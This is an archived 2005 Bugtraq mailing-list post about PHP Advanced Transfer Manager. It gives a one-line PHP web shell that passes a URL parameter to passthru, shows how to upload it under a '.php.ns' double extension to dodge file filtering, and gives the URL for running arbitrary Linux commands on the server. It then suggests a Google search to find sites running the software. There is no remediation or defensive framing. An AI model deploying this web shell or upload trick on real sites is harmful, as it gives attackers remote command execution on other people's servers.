[40959] in bugtraq
uplod phpshell in PHP Advanced Transfer Manager
daemon@ATHENA.MIT.EDU (sQl@hotmail.com)
Sat Oct 29 20:54:06 2005
Date: 29 Oct 2005 18:46:03 -0000
Message-ID: <20051029184603.26035.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: sQl@hotmail.com
To: bugtraq@securityfocus.com
<
uplod phpshell in PHP Advanced Transfer Manager
one save as the code :
--------
<pre>
<?
passthru($_GET['sQl']);
?>
--------
file > save as > sQl.php.ns
now upload in the PHP Advanced Transfer Manager
end the upload go to >
www.site.com/[file upload name]/[files]/sQl.php.ns?sQl=[command linux]
search google :
PHP Advanced Transfer Manager
}
by sQl
sQl[at]homail.[com]
{
>